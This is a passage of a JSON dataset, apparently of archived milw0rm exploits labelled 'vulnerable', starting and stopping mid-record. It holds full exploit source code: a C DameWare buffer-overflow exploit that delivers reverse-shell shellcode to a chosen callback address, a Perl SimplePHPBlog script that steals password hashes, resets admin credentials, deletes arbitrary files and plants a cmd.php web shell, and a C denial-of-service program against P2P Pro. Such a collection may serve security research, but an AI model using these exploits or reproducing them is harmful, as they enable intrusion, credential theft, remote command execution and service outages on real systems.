tip;\n\n               unsigned int ser_p=0;\n\n               int ver=0;\n\n\n\n       printf(\"\\n\\n        ====== D4m3w4r3 eXpLo1t, By jpno5 ======\\n\");\n\n       printf(\"        ======    http://www.jpno5.com    ======\\n\\n\");\n\n       if(argc < 5){ printf(\"[+] %s Target_Ip Target_Port Return_Ip Return_Port\\n\\n\",argv[0]);return 1;}\n\n\n\n       WSAStartup(0x0202, &wsaData);\n\n\n\n       tip=ip(argv[1]);\n\n       tport = atoi(argv[2]);\n\n       lip=inet_addr(argv[3])^(long)0x00000000;\n\n       lport=htons(atoi(argv[4]))^(short)0x0000;\n\n\n\n       memcpy(&rshell[184], &lip, 4);\n\n       memcpy(&rshell[190], &lport, 2);\n\n\n\n       memset(&targetTCP, 0, sizeof(targetTCP));memset(&localTCP, 0, sizeof(localTCP));\n\n\n\n       targetTCP.sin_family = AF_INET;\n\n       targetTCP.sin_addr.s_addr = tip;\n\n       targetTCP.sin_port = htons(tport);\n\n\n\n       localTCP.sin_family = AF_INET;\n\n       localTCP.sin_addr.s_addr = INADDR_ANY;\n\n       localTCP.sin_port = htons((unsigned short)atoi(argv[4]));\n\n\n\n       if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)     {\n\n               printf(\"\\t\\t\\t[ FAILED ]\\n\");\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n       if ((localSockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){\n\n               printf(\"\\t\\t\\t[ FAILED ]\\n\");\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n\n\n       printf(\"[#] Listening For Shell On: %s...\",argv[4]);\n\n\n\n       if(bind(localSockTCP,(struct sockaddr *)&localTCP,sizeof(localTCP)) !=0){\n\n               printf(\"\\t\\t\\n Binding To Port: %s Failed! Make Sure It Aint In Use Arleady\\n\",argv[4]);\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n\n\n       if(listen(localSockTCP,1) != 0){\n\n               printf(\"\\t\\t\\t[ FAILED ]\\nFailed to listen on port: %s!\\n\",argv[4]);\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n\n\n       ver = check(argv[1],(unsigned short)atoi(argv[2]),&ser_p);\n\n\n\n       printf(\"\\n[*] Target: %s SP: %d...\",target_os[ver].type,ser_p);\n\n\n\n       memcpy(packet,\"\\x10\\x27\",2);\n\n       memcpy(packet+0xc4+9,rshell,strlen(rshell));\n\n       *(unsigned long*)&packet[516] = target_os[ver].sp[ser_p].eip;\n\n       memcpy(packet+520,fpay,strlen(fpay));\n\n\n\n       if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){\n\n               printf(\"\\n[x] Connection to host failed!\\n\");\n\n               WSACleanup();\n\n               exit(1);\n\n       }\n\n\n\n       switchon=1;\n\n       ioctlsocket(sockTCP,FIONBIO,&switchon);\n\n       tv.tv_sec = RECVTIMEOUT;\n\n       tv.tv_usec = 0;FD_ZERO(&fds);\n\n       FD_SET(sockTCP,&fds);\n\n\n\n       if((select(1,&fds,0,0,&tv))>0){\n\n               recv(sockTCP, buff1, sizeof(buff1),0);}else{\n\n                       printf(\"[x] Timeout! Failed to recv packet.\\n\");\n\n                       exit(1);\n\n               }\n\n\n\n       memset(buff1,0,sizeof(buff1));\n\n       switchon=0;ioctlsocket(sockTCP,FIONBIO,&switchon);\n\n\n\n       if (send(sockTCP, buff, sizeof(buff),0) == -1){\n\n               printf(\"[x] Failed to inject packet!\\n\");\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n\n\n       switchon=1;\n\n       ioctlsocket(sockTCP,FIONBIO,&switchon);\n\n       tv.tv_sec = RECVTIMEOUT;tv.tv_usec = 0;\n\n       FD_ZERO(&fds);FD_SET(sockTCP,&fds);\n\n\n\n       if((select(sockTCP+1,&fds,0,0,&tv))>0){\n\n               recv(sockTCP, buff1, sizeof(buff1),0);switchon=0;\n\n       ioctlsocket(sockTCP,FIONBIO,&switchon);\n\n\n\n       if (send(sockTCP, packet, sizeof(packet),0) == -1){\n\n               printf(\"[x] Failed to inject packet! \\n\");\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n       }else{\n\n               printf(\"\\n[x] Timedout! Failed to receive packet!\\n\");\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n\n\n       closesocket(sockTCP);\n\n\n\n       printf(\"\\n[*] Waiting for Shell...\\r\");\n\n\n\n       switchon=1;\n\n       ioctlsocket(localSockTCP,FIONBIO,&switchon);\n\n       tv.tv_sec = ACCEPT_TIMEOUT;\n\n       tv.tv_usec = 0;FD_ZERO(&fds);\n\n       FD_SET(localSockTCP,&fds);\n\n\n\n       if((select(1,&fds,0,0,&tv))>0){\n\n               acsz = sizeof(inAccTCP);\n\n               accSockTCP = accept(localSockTCP,(struct sockaddr *)&inAccTCP, &acsz);\n\n               printf(\"\\n[*] Enjoy...\\n\\n\");\n\n               shell(accSockTCP);\n\n       }else{\n\n               printf(\"\\n[x] Exploit Failed! Proberly Patched\\n\");\n\n               WSACleanup();\n\n       }\n\n       return 0;\n\n}\n\n\n\nlong ip(char *hostname) {\n\n       struct hostent *he;\n\n       long ipaddr;\n\n\n\n       if ((ipaddr = inet_addr(hostname)) < 0) {\n\n       if ((he = gethostbyname(hostname)) == NULL) {\n\n               printf(\"[x] Failed to resolve host: %s!\\n\\n\",hostname);\n\n               WSACleanup();exit(1);\n\n       }\n\n\n\n       memcpy(&ipaddr, he->h_addr, he->h_length);}return ipaddr;}\n\n\n\n void shell (int sock){\n\n struct timeval tv;int length;\n\n unsigned long o[2];\n\n char buffer[1000];\n\n\n\n tv.tv_sec = 1;tv.tv_usec = 0;\n\n while (1){ o[0] = 1;o[1] = sock;\n\n       length = select (0, (fd_set *)&o, NULL, NULL, &tv);\n\n       if(length == 1){length = recv (sock, buffer, sizeof (buffer), 0);\n\n       if (length <= 0) {\n\n               printf (\"[x] Connection closed.\\n\");\n\n               WSACleanup();\n\n               return;\n\n       }\n\n       length = write (1, buffer, length);\n\n       if (length <= 0) {\n\n               printf (\"[x] Connection closed.\\n\");\n\n               WSACleanup();return;}}else{length = read (0, buffer, sizeof (buffer));\n\n       if (length <= 0) {\n\n               printf (\"[x] Connection closed.\\n\");\n\n               WSACleanup();return;}length = send(sock, buffer, length, 0);\n\n       if (length <= 0) {\n\n               printf (\"[x] Connection closed.\\n\");\n\n               WSACleanup();\n\n               return;\n\n               }}}}\n\n\n\nint check(char *host,unsigned short tport, unsigned int *sp){\n\n\n\n       int sockTCP,switchon;\n\n       struct sockaddr_in targetTCP;\n\n       struct timeval tv;fd_set fds;\n\n\n\n       memset(&targetTCP,0,sizeof(targetTCP));\n\n       targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr = inet_addr(host);targetTCP.sin_port = htons(tport);\n\n\n\n       if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){\n\n               printf(\"\\t\\t\\t[ FAILED ]\\n Socket not initialized! Exiting...\\n\");\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n\n\n       if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){\n\n               printf(\"[x] Connection to host failed!\\n\");\n\n               WSACleanup();\n\n               exit(1);\n\n       }\n\n\n\n       switchon=1;\n\n       ioctlsocket(sockTCP,FIONBIO,&switchon);\n\n       tv.tv_sec = RECVTIMEOUT;\n\n       tv.tv_usec = 0;\n\n       FD_ZERO(&fds);FD_SET(sockTCP,&fds);\n\n\n\n       if((select(1,&fds,0,0,&tv))>0){\n\n               recv(sockTCP, buff1, sizeof(buff1),0);}\n\n       else{\n\n               printf(\"[x]Timedout! Doesn't Look Like A Dameware Server\\n\");\n\n               exit(1);\n\n       }\n\n\n\n       switchon=0;\n\n       ioctlsocket(sockTCP,FIONBIO,&switchon);\n\n\n\n       if (send(sockTCP, buff, sizeof(buff),0) == -1){\n\n               printf(\"[x] Failed\\n\");\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n\n\n       switchon=1;\n\n       ioctlsocket(sockTCP,FIONBIO,&switchon);\n\n\n\n       tv.tv_sec = RECVTIMEOUT;\n\n       tv.tv_usec = 0;FD_ZERO(&fds);\n\n       FD_SET(sockTCP,&fds);\n\n\n\n       if((select(sockTCP+1,&fds,0,0,&tv))>0){\n\n               recv(sockTCP, buff1, sizeof(buff1),0);\n\n               closesocket(sockTCP);\n\n       } else {\n\n               printf(\"\\n[x] Timedout!\\n\");\n\n               WSACleanup();\n\n               return 1;\n\n       }\n\n\n\n       if(buff1[8]==5 && buff1[12]==0){*sp = atoi(&buff1[37]);\n\n       closesocket(sockTCP);\n\n       return WIN2K;\n\n       }  else if(buff1[8]==5 && buff1[12]==1){*sp = atoi(&buff1[37]);\n\n       closesocket(sockTCP);\n\n       return WINXP;\n\n       }  else if(buff1[8]==5 && buff1[12]==2){*sp = atoi(&buff1[37]);\n\n       closesocket(sockTCP);\n\n       return WIN2K3;\n\n       } else if(buff1[8]==4){*sp = atoi(&buff1[37]);\n\n       closesocket(sockTCP);\n\n       return WINNT;\n\n       } else{\n\n               closesocket(sockTCP);\n\n       return UNKNOWN;\n\n       }\n\n}\n\n\n\n// milw0rm.com [2005-08-31]",
1000        "vulnerable": true
1001    },
1002    {
1003        "exploit_id": 1191,
1004        "content": "#!/usr/bin/perl -w\n\n#===============================================================================\n\n#\tTitle:\t\tsphpblog_vulns.pl\n\n#\n\n#\tWritten by: \tKenneth F. Belva, CISSP\n\n#\t\t\tFranklin Technologies Unlimited, Inc.\n\n#\t\t\thttp://www.ftusecurity.com\n\n#\n\n#\tDate: \t\tAugust 25, 2005\n\n#\n\n#\tVersion:\t0.1\n\n#\n\n#\tDescription:\tThis program is for educational purposes only!\n\n#\t\t\tSimplePHPBlog as a few vulnerability which this\n\n#\t\t\tperl script demonstrates via an exploit.\n\n#\n\n#\tInstructions:\tShould be self-explanatory via the .pl help menu\n\n#\n\n#\tSolutions:\t\n\n#\t\t\t*** Solution 1\n\n#\t\t\tChange the line in comment_delete_cgi.php from\n\n#\t\t\t$logged_in = logged_in( false, true );    to\n\n#\t\t\t$logged_in = logged_in( true, true );\n\n#\n\n#\t\t\t*** Solution 2\n\n#\t\t\tPlace an .htaccess file with the following config in\n\n#\t\t\tthe ./config directory:\n\n#\n\n#\n\n#\t\t\t#---------------------\n\n#\t\t\t#Snip .htaccess start\n\n#\t\t\t#---------------------\t\t\t\n\n#\t\t\tIndexIgnore *\n\n#\n\n#\t\t\t<Files .htaccess>\n\n#\t\t\torder allow,deny\n\n#\t\t\tdeny from all\n\n#\t\t\t</Files>\n\n#\t\t\t\n\n#\t\t\t<Files *.txt>\n\n#\t\t\torder allow,deny\n\n#\t\t\tdeny from all\n\n#\t\t\t</Files>\n\n#\t\t\t#---------------------\n\n#\t\t\t#Snip .htaccess end\n\n#\t\t\t#---------------------\n\n#\n\n#\n\n#\t\t\t*** Solution 3\n\n#\t\t\tSee http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html\n\n#\t\t\t\tfor PHP modification to upload image script.\n\n#===============================================================================\n\n\n\n\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tGlobal Paramaters\n\n#-------------------------------------------------------------------------------\n\nuse strict;\n\nuse warnings;\n\n\n\nuse vars qw/ %args /;\n\n\n\nuse Getopt::Std;\n\nrequire LWP::UserAgent;\n\nmy $ua = LWP::UserAgent->new;\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tGlobal Routines\n\n#-------------------------------------------------------------------------------\n\n\n\n#Determine Operating System\n\nmy $OperatingSystem = $^O;\n\nmy $unix = \"\";\n\n\n\n#Set OS Parameter\n\nif (index(lc($OperatingSystem),\"win\")!=-1){\n\n\t\t   $unix=\"0\"; #windows system\n\n\t    }else{\n\n\t\t    $unix=\"1\"; #unix system\n\n\t    }\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tThe Main Menu\n\n#-------------------------------------------------------------------------------\n\n\n\nsub menu()\n\n    {\n\n\t    if ($unix){system(\"clear\");}\n\n\t    \telse{system(\"cls\");}\n\n\n\n\t    print \"\n\n________________________________________________________________________________\n\n\t\t  SimplePHPBlog v0.4.0 Exploits\n\n\t\t\t     by\n\n\t\t     Kenneth F. Belva, CISSP\n\n\t\t   http://www.ftusecurity.com\n\n________________________________________________________________________________\n\n\n\n\tProgram\t: $0\n\n\tVersion\t: v0.1\n\n\tDate\t: 8/25/2005\n\n\tDescript: This perl script demonstrates a few flaws in\n\n\t\t  SimplePHPBlog.\n\n\t\n\n\tComments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...\n\n\t\t  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO \n\n\t\t  NOT HAVE PERMISSION TO DO SO!\n\n\t\t  \n\n\t\t  Please see this script comments for solution/fixes \n\n\t\t  to demonstrated vulnerabilities. \n\n\t\t  http://www.simplephpblog.com\n\n\n\n\tUsage\t: $0 [-h host] [-e exploit]\n\n\t\n\n\t\t-?      : this menu\n\n\t\t-h      : host\n\n\t\t-e\t: exploit\n\n\t\t\t(1)\t: Upload cmd.php in [site]/images/\n\n\t\t\t(2)\t: Retreive Password file (hash)\n\n\t\t\t(3)\t: Set New User Name and Password\n\n\t\t\t\t[NOTE - uppercase switches for exploits]\n\n\t\t\t\t-U\t: user name\n\n\t\t\t\t-P\t: password\n\n\t\t\t(4)\t: Delete a System File\n\n\t\t\t\t-F\t: Path and System File \n\n\n\n\tExamples: $0 -h 127.0.0.1 -e 2\n\n\t\t  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t\n\n\t\t  $0 -h 127.0.0.1 -e 4 -F ./index.php\n\n\t\t  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd\n\n\t\t  $0 -h 127.0.0.1 -e 1\n\n\t\";\t\n\n        \n\n\texit;\n\n    }\n\n\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tInitial Routine\n\n#-------------------------------------------------------------------------------\n\n\n\n    sub init()\n\n    {\n\n\n\n\tuse Switch;\n\n\t\n\n\t# colon ':' after letter says that option takes variable\n\n        my $opt_string = 'e:U:P:h:F:?';\n\n        getopts( \"$opt_string\", \\%args ) or menu();\n\n\t\n\n\t#Load parameters\n\n\tmy $exploit = $args{e};\n\n\tmy $host = $args{h};\n\n\tmy $user = $args{U};\n\n\tmy $pass = $args{P};\n\n\tmy $file = $args{F};\n\n\t\n\n\t# What shall we do today?\n\n\tswitch (%args) {\n\n\t\tcase \"?\"\t{ menu();}\n\n\t\tcase \"e\"\t{\n\n\t\t\t\tswitch ($exploit) {\n\n\t\t\t\t\t\n\n\t\t\t\t\tif ($unix){system(\"clear\");}\n\n\t\t\t\t\telse{system(\"cls\");}\n\n\t\t\t\t\t\n\n\t\t\t\t\tprint \"\n\n________________________________________________________________________________\n\n\t\t  SimplePHPBlog v0.4.0 Exploits\n\n\t\t\t     by\n\n\t\t     Kenneth F. Belva, CISSP\n\n\t\t    http://www.ftusecurity.com\n\n________________________________________________________________________________\";\n\n\n\n\n\n\t\t\t\t\t# Upload cmd.php to /images\n\n\t\t\t\t\tcase \"1\" {\tprint \"\\nRunning cmd.php Upload Exploit....\\n\\n\";\n\n\t\t\t\t\t\t\t&UploadCmdPHP($host);}\n\n\t\t\t\t\t# Retrieve Username & Password hash\n\n\t\t\t\t\tcase \"2\" {\tprint \"\\nRunning Username and Password Hash Retrieval Exploit....\\n\\n\";\n\n\t\t\t\t\t\t\t&RetrievePwd($host.\"/config/password.txt\");}\n\n\t\t\t\t\t# Replace Username and Password\n\n\t\t\t\t\tcase \"3\" {\tprint \"\\nRunning Set New Username and Password Exploit....\\n\\n\";\n\n\t\t\t\t\t\t\t&SetUserPwd($host,$user,$pass);}\n\n\t\t\t\t\t# Delete a System File\n\n\t\t\t\t\tcase \"4\" {\tprint \"\\nRunning Delete System File Exploit....\\n\\n\";\n\n\t\t\t\t\t\t\t&DeleteFile($host . \"/comment_delete_cgi.php?y=05&m=08&comment=\",$file);}\n\n\n\n\t\t\t\t\t} #end $exploit switch\n\n\t\t\t\t\tprint \"\\n\\n\\n*** Exploit Completed....\\nHave a nice day! :)\\n\";\n\n\t\t\t\t} #end \"e\" case\n\n\t\telse\t\t{ menu();}\n\n\t\t} #end %args switch\n\n\n\n    } #end sub init\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tExploit #1: Upload File Via POST \n\n#-------------------------------------------------------------------------------\n\n\n\nsub UploadCmdPHP {\n\n\n\n\t\n\n\tmy($url) = @_;\n\n\t\n\n\tuse LWP;\n\n\tuse HTTP::Request::Common qw(POST);\n\n\tmy $ua = LWP::UserAgent->new;\n\n\t\n\n\t$HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++;\n\n\n\n\t#Step 1: Retrieve hash\n\n\t#-----------------------------------------------------------------------\n\n\tmy $hash = &RetrievePwd($url.\"/config/password.txt\");\n\n\t\n\n\n\n\t#Step 2: Delete Existing Password file (SetUserPwd)\n\n\t#Step 3: Create a temporary user id and password (SetUserPwd)\n\n\t#-----------------------------------------------------------------------\n\n\t&SetUserPwd($url,\"a\",\"a\");\n\n\t\n\n\n\n\t#Step 4: Log into the app and get the PHPSession / my_id session variable\n\n\t#-----------------------------------------------------------------------\n\n\tmy $SETcookie = &strip_session(&Login($url . \"/login_cgi.php\",\"a\",\"a\"));\n\n\t\n\n\t\n\n\t#Step 5: Create and upload our scripts (cmd.php & reset.php)\n\n\t#-----------------------------------------------------------------------\n\n\t\t&CreateTempPHPs();\n\n\t\n\n\t# Upload cmd.php\n\n\tmy $path = \"./cmd.php\";\n\n\tmy $file = \"cmd.php\";\n\n\tmy $req = POST($url.\"/upload_img_cgi.php\",\n\n\t\tCookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,\n\n\t\tContent_Type => 'form-data',\n\n\t\tContent => [userfile => [$path,$file],],\n\n\t\t);\n\n\t\n\n\tmy $response = $ua->request($req);\n\n\tprint \"\\nCreated cmd.php on target host: \" . $url;\n\n\t#$response->is_success or die \"Failed to POST '$url': \", $response->status_line;\n\n\t#return $response->as_string;\n\n\t\n\n\t# Upload reset.php\n\n\t$path = \"./reset.php\";\n\n\t$file = \"reset.php\";\n\n\t\t\n\n\t$req = POST($url.\"/upload_img_cgi.php\",\n\n\t\tCookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,\n\n\t\tContent_Type => 'form-data',\n\n\t\tContent => [userfile => [$path,$file],],\n\n\t\t);\n\n\t\n\n\t$response = $ua->request($req);\n\n\tprint \"\\nCreated reset.php on target host: \" . $url;\n\n\t#$response->is_success or die \"Failed to POST '$url': \", $response->status_line;\n\n\t#return $response->as_string;\n\n\t\n\n\t\t#Remove local PHP files\n\n\t\t&RemoveTempPHPs();\n\n\n\n\t\t\n\n\t#Step 6: Reset origional Passwpord\n\n\t#-----------------------------------------------------------------------\n\n\t&ResetHash($url.\"/images/reset.php\",$hash);\n\n\n\n\t\n\n\t#Step 7: Pass command to delete reset.php (clean up)\n\n\t#-----------------------------------------------------------------------\n\n\t&DeleteFile($url . \"/comment_delete_cgi.php?y=05&m=08&comment=\",\"./images/reset.php\");\n\n\tprint \"\\nRemoved reset.php from target host: \" . $url;\n\n\n\n\tprint \"\\n\\nTo run command please go to following link: \\n\\t\" . $url.\"/images/cmd.php?cmd=[your command]\";\n\n}\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tExploit #2: Retrieve Password File \n\n#-------------------------------------------------------------------------------\n\n\n\nsub RetrievePwd {\n\n\t\n\n\tmy($url) = @_;\n\n\t\n\n\tuse LWP;\n\n\tuse HTTP::Request::Common;\n\n\tmy $ua = LWP::UserAgent->new;\n\n\n\n\tmy $req = GET($url);\n\n\t\n\n\tmy $response = $ua->request($req);\n\n\n\n\t$response->is_success or die \"Failed to POST '$url': \", $response->status_line;\n\n\t\n\n\tmy $hash = $response->content;\n\n\tprint \"\\nRetrieved Username and Password Hash: \" . $hash; \n\n\treturn $hash\n\n\n\n}\n\n\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tExploit #3: Set New Username and Password \n\n#-------------------------------------------------------------------------------\n\n\n\nsub SetUserPwd{\n\n\n\n\tmy($url,$user,$pass) = @_;\n\n\n\n\t&DeleteFile($url . \"/comment_delete_cgi.php?y=05&m=08&comment=\", \"./config/password.txt\");\n\n\t&ResetPwd($url . \"/install03_cgi.php?blog_language=english\",$user,$pass);\n\n}\n\n\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tPOST to Reset Username and Password (must delete password file first)\n\n#-------------------------------------------------------------------------------\n\n\n\nsub ResetPwd {\n\n\t\n\n\tmy($url,$user,$pass) = @_;\n\n\t\n\n\tuse LWP;\n\n\tuse HTTP::Request::Common;\n\n\tmy $ua = LWP::UserAgent->new;\n\n\n\n\tmy $req = POST($url,\n\n\t\t      [ user  => $user,\n\n\t\t\tpass => $pass,\n\n\t\t\tsubmit => '%C2%A0Submit%C2%A0'\n\n\t\t\t]\n\n\t\t);\n\n\t\n\n\tmy $response = $ua->request($req);\n\n\n\n\t$response->is_success or die \"Failed to POST '$url': \", $response->status_line;\n\n\n\n\tprint \"\\n./config/password.txt created!\";\n\n\tprint \"\\nUsername is set to: \".$user;\n\n\tprint \"\\nPassword is set to: \".$pass;\n\n\t\n\n}\n\n\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tExploit #4: Delete Password File \n\n#-------------------------------------------------------------------------------\n\n\n\nsub DeleteFile {\n\n\t\n\n\tmy($url,$file) = @_;\n\n\t\n\n\tuse LWP;\n\n\tuse HTTP::Request::Common;\n\n\tmy $ua = LWP::UserAgent->new;\n\n\n\n\tmy $req = GET($url.$file);\n\n\t\n\n\tmy $response = $ua->request($req);\n\n\n\n\t$response->is_success or die \"Failed to POST '$url': \", $response->status_line;\n\n\tprint \"\\nDeleted File: \".$file; \n\n\t\n\n}\n\n\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tlog into site\n\n#-------------------------------------------------------------------------------\n\n\n\nsub Login {\n\n\n\n\tmy($url,$user,$pass) = @_;\n\n\t\n\n\tuse LWP;\n\n\tuse HTTP::Request::Common;\n\n\tmy $ua = LWP::UserAgent->new;\n\n\n\n\tmy $req = POST($url,\n\n\t\t      [ user  => $user,\n\n\t\t\tpass => $pass,\n\n\t\t\tsubmit => '%C2%A0Submit%C2%A0'\n\n\t\t\t]\n\n\t\t);\n\n\t\n\n\tmy $response = $ua->request($req);\n\n\n\n\t$response->is_success or die \"Failed to POST '$url': \", $response->status_line;\n\n\n\n\tprint \"\\nLogged into SimplePHPBlog at: \".$url;\n\n\tprint \"\\nCurrent Username '\".$user.\"' and Password '\".$pass.\"'...\";\n\n\t\n\n\treturn $response->header('Set-Cookie');\n\n\t\n\n}\n\n\n\n\n\n#-------------------------------------------------------------------------------\n\n#\tPOST the hash\n\n#-------------------------------------------------------------------------------\n\n\n\nsub ResetHash {\n\n\n\n\tmy($url,$hash) = @_;\n\n\t\n\n\tuse LWP;\n\n\tuse HTTP::Request::Common;\n\n\tmy $ua = LWP::UserAgent->new;\n\n\n\n\tmy $req = POST($url,\n\n\t\t      [ hash  => $hash]\n\n\t\t);\n\n\t\n\n\tmy $response = $ua->request($req);\n\n\n\n\t$response->is_success or die \"Failed to POST '$url': \", $response->status_line;\n\n\n\n\tprint \"\\nReset Hash at: \".$url;\n\n\tprint \"\\nReset Hash value: \".$hash;\n\n\t\n\n\t\n\n}\n\n\n\n\n\n#------------------------------------------------------\n\n# Create Temp PHP files\n\n#------------------------------------------------------\n\n\n\nsub CreateTempPHPs{\n\n\n\n\tmy($hash) = @_;\n\n\n\n\topen(PHPFILE, \">./cmd.php\");\n\n\tprint PHPFILE &CreateCmdPHP();\n\n\tclose PHPFILE;\n\n\tprint \"\\nCreated cmd.php on your local machine.\";\n\n\t\n\n\topen(PHPFILE, \">./reset.php\");\n\n\tprint PHPFILE &CreateResetPHP();\n\n\tclose PHPFILE;\n\n\tprint \"\\nCreated reset.php on your local machine.\";\t\n\n}\n\n\n\n#------------------------------------------------------\n\n# Remove Temp PHP files\n\n#------------------------------------------------------\n\n\n\nsub RemoveTempPHPs{\n\n\n\n\tunlink(\"./cmd.php\");\n\n\tprint \"\\nRemoved cmd.php from your local machine.\";\n\n\tunlink(\"./reset.php\");\n\n\tprint \"\\nRemoved reset.php from your local machine.\";\n\n\t\n\n}\n\n\n\n\n\n#------------------------------------------------------\n\n# strip_session - Get PHP Session Variable\n\n#------------------------------------------------------\n\n\n\nsub strip_session {\n\n\t\n\n\tmy($savedata) = @_;\n\n\n\n\tmy $PHPstring = \"PHPSESSID\";\n\n\tmy $semi = \"\\;\";\n\n\t\n\n\tmy $datalength = length($savedata);\n\n\tmy $PHPstart= (index $savedata, $PHPstring)+10;\n\n\tmy $PHPend = index $savedata,$semi,$PHPstart;\n\n\tmy $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart);\n\n\treturn $PHPsession;\n\n\t\n\n}\n\n\n\n\n\nsub CreateCmdPHP(){\n\n\t\n\n\treturn \"\n\n\n\n<?php\n\n\n\n\\$cmd = \\$_GET[\\'cmd\\'];\n\necho \\'<hr/><pre>\\';\n\necho \\'Command: \\' . \\$cmd;\n\necho '</pre><hr/><br>';\n\n\n\necho '<pre>';\n\n\\$last_line = system(\\$cmd,\\$output);\n\necho \\'</pre><hr/>\\';\n\n?>.\n\n\"; # end \n\n\t\n\n}\n\n\n\n\n\nsub CreateResetPHP(){\n\n\t\n\n\treturn \"\n\n\n\n<?php\n\n\n\n\\$hash = \\$_POST[\\'hash\\'];\n\n\\$fp = fopen(\\\"../config/password.txt\\\",\\\"w\\\");\n\nfwrite(\\$fp,\\$hash);\n\nfpclose(\\$fp);\n\n\n\n?>\n\n\"; #end return\n\n\n\n}\n\n\n\n\n\n#------------------------------------------------------\n\n# \tBegin Routines\n\n#------------------------------------------------------\n\n\tinit();\n\n\n\n# milw0rm.com [2005-09-01]",
1005        "vulnerable": true
1006    },
1007    {
1008        "exploit_id": 1192,
1009        "content": "/*\n\n     P2P Pro Command DOS Exploit\n\n ------------------------------------\n\n  Infam0us Gr0up - Securiti Research\n\n\n\n Info: infamous.2hell.com\n\n Vendor URL: http://www.digital-revolution.org/P2PPro.html\n\n\n\n*/\n\n\n\n#include string.h\n\n#include winsock2.h \n\n#include stdio.h \n\n\n\n#pragma comment(lib, \"ws2_32.lib\") \n\n\n\nchar doscore[] = \n\n\"\\x3f\\x3f\\xbc\\x59\\x70 \"\n\n\"\\x32\\x70\\x3f\\xe1 \"\n\n\"\\x2b\\x5c\\x3f\\xa6\\xeb\\xa6\"\n\n\"\\x50\\x46\\x2b\\x5c\\x3f\\xa6\\xeb\\xa6\"\n\n\"\\x50\\x4f\\x57\\x4e\\x45\\x44\\x2e\\x74\"\n\n\"\\x78\\x74\\x2b\\x5c\\x3f\\xa6\\xeb\\xa6\"\n\n\"\\x50\\x31\\x32\\x33\\x32\\x34\\x32\\x2e\\x6b\\x62\";\n\n\n\n\n\nint main(int argc, char *argv[]) \n\n{ \n\nWSADATA wsaData; \n\nWORD wVersionRequested; \n\nstruct hostent *pTarget; \n\nstruct sockaddr_in sock; \n\nchar *target; \n\nint port,bufsize; \n\nSOCKET inetdos; \n\n\n\nif (argc < 2) \n\n{ \n\nprintf(\"        P2P Pro Command DOS Exploit \\n\", argv[0]);\n\nprintf(\"  --------------------------------------\\n\", argv[0]);\n\nprintf(\"    Infam0us Gr0up - Securiti Research\\n\\n\", argv[0]);\n\nprintf(\"[-]Usage: %s [target] [port]\\n\", argv[0]); \n\nprintf(\"[?]Exam: %s localhost 7802\\n\", argv[0]); \n\nexit(1); \n\n} \n\n\n\nwVersionRequested = MAKEWORD(1, 1); \n\nif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; \n\n\n\ntarget = argv[1]; \n\nport = 7802; \n\n\n\nif (argc >= 3) port = atoi(argv[2]); \n\nbufsize = 1024; \n\nif (argc >= 4) bufsize = atoi(argv[3]); \n\n\n\ninetdos = socket(AF_INET, SOCK_STREAM, 0); \n\nif(inetdos==INVALID_SOCKET) \n\n{ \n\nprintf(\"Socket ERROR \\n\"); \n\nexit(1); \n\n} \n\nprintf(\"    P2P Pro Command DOS Exploit \\n\", argv[0]);\n\nprintf(\"  --------------------------------------\\r\\n\\n\", argv[0]);\n\nprintf(\"Resolve host... \"); \n\nif ((pTarget = gethostbyname(target)) == NULL) \n\n{ \n\nprintf(\"FAILED \\n\", argv[0]); \n\nexit(1); \n\n} \n\nprintf(\"[OK]\\n \");\n\nmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); \n\nsock.sin_family = AF_INET; \n\nsock.sin_port = htons((USHORT)port); \n\n\n\nprintf(\"[+] Connecting... \"); \n\nif ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) \n\n{ \n\nprintf(\"FAILED\\n\"); \n\nexit(1); \n\n} \n\nprintf(\"[OK]\\n\");\n\nprintf(\"Target listen.. \\n\"); \n\nprintf(\"Sending bad procedure... \"); \n\nif (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) \n\n{ \n\nprintf(\"ERROR\\n\"); \n\nclosesocket(inetdos); \n\nexit(1); \n\n} \n\nprintf(\"[OK]\\n \");\n\nprintf(\"[+] Server SHUTDOWNED!\\n\"); \n\nclosesocket(inetdos); \n\nWSACleanup(); \n\nreturn 0; \n\n}\n\n\n\n// milw0rm.com [2005-09-02]",
1010        "vulnerable": true
1011    },
1012    {
1013        "exploit_id": 1193,
